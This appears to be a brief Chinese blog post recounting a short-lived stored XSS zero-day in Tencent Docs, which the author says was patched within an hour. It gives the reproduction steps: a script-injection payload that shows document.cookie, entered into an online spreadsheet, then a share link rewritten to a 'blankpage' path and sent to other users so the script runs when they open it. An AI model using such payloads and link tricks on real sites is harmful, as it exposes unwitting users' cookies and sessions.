2021年9月6日星期一

昙花一现的腾讯文档存储型xss 0day

 日期:2021.9.3

腾讯文档 doc.qq.com

复现过程:

先在腾讯文档新建一份空文档(在线表格),内容填:

</script><script>alert(document.cookie)</script>

保存后分享,正常分享链接 https://docs.qq.com/sheet/DSG13VmhlYVNIYUJs?tab=BB08J2

将分享连接改为 https://docs.qq.com/blankpage/DSG13VmhlYVNIYUJs

然后分享给别人,别人点开后就会触发xss了














可惜这玩意是见光死,群里正在狂欢的时候,不到一小时就发现此漏洞已修复。(不排除有内鬼)